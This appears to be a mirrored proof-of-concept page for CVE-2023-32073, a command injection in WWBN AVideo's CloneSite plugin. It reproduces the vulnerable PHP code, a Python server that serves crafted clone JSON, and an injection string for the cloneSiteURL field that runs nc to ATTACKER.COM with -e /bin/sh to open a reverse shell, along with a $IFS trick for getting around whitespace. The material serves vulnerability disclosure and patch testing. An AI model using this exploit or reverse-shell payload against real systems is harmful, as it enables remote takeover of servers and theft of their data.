Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2023-32073 PoC — WWBN AVideo 命令注入漏洞

Source
https://github.com/jmrcsnchz/CVE-2023-32073
Associated Vulnerability
Title:WWBN AVideo 命令注入漏洞 (CVE-2023-32073)
Description:WWBN AVideo是WWBN团队的一个由PHP编写的视频平台建站系统。 WWBN AVideo 12.4之前版本存在命令注入漏洞,该漏洞源于存在命令注入漏洞,攻击者利用该漏洞可以远程执行代码。
Description
WWBN AVideo Authenticated RCE
Readme
# WWBN AVideo  {currentVersion} Authenticated RCE 

A command injection vulnerability exists at `plugin/CloneSite/cloneClient.json.php` which allows Remote Code Execution if you CloneSite Plugin. This is a bypass to the fix for [CVE-2023-30854](https://cve.report/CVE-2023-30854) which affects WWBN Avideo up to version 12.3

## Vulnerable Code

/plugin/CloneSite/cloneClient.json.php

```php
$json->sqlFile = escapeshellarg(preg_replace('/[^a-z0-9_.-]/i', '', $json->sqlFile));
$json->videoFiles = escapeshellarg(preg_replace('/[^a-z0-9_.-]/i', '', $json->videoFiles));
$json->photoFiles = escapeshellarg(preg_replace('/[^a-z0-9_.-]/i', '', $json->photoFiles));

// get dump file
$cmd = "wget -O {$clonesDir}{$json->sqlFile} {$objClone->cloneSiteURL}videos/cache/clones/{$json->sqlFile}";
$log->add("Clone (2 of {$totalSteps}): Geting MySQL Dump file");
exec($cmd . " 2>&1", $output, $return_val);
```

The `$objClone->cloneSiteURL` is not properly sanitized.
## Exploit Proof-of-Concept

avidexploit.py
```python
from http.server import BaseHTTPRequestHandler, HTTPServer
import time

hostName = "localhost"
serverPort = 8080

class MyServer(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(200)
        self.send_header("Content-type", "application/json")
        self.end_headers()
        self.wfile.write(bytes("{\"error\":false,\"msg\":\"\",\"url\":\"https:\/\/attacker.com/\/\",\"key\":\"2d6db3c09e41a9c27dbc72aecc4a6fc0\",\"useRsync\":1,\"videosDir\":\"\/var\/www\/html\/demo.avideo.com\/videos\/\",\"sqlFile\":\"Clone_mysqlDump_644ab263e62d6.sql\",\"videoFiles\":[],\"photoFiles\":[]}", "utf-8"))

if __name__ == "__main__":        
    webServer = HTTPServer((hostName, serverPort), MyServer)
    print("Server started http://%s:%s" % (hostName, serverPort))

    try:
        webServer.serve_forever()
    except KeyboardInterrupt:
        pass

    webServer.server_close()
    print("Server stopped.")
```

Run in command line
```bash
$ python3 avidexploit.py &
$ ngrok tcp 8080 # optional if not running in VPS
```
- Then get your public facing IP and Port. Enter a cloneSiteURL like the following then hit clone to achieve command injection
```bash
http://2.tcp.ngrok.io:14599/;nc$IFS'ATTACKER.COM'$IFS'5555'$IFS-e$IFS/bin/sh;#
```

**It is important to not use white spaces for the exploit to work. Replace whitespace with `$IFS` when adding arguments to your RCE**


![poc](https://i.ibb.co/bdpQYcK/2023-05-07-17-04-43-online-video-cutter-com.gif)

## Credits

- JM Sanchez
- [https://www.linkedin.com/in/juanmarcosanchez/](https://www.linkedin.com/in/juanmarcosanchez/)
File Snapshot

 [4.0K]  /data/pocs/9895a71536a96ace8eca03ac8b817c9f4b59565d
└── [2.6K]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.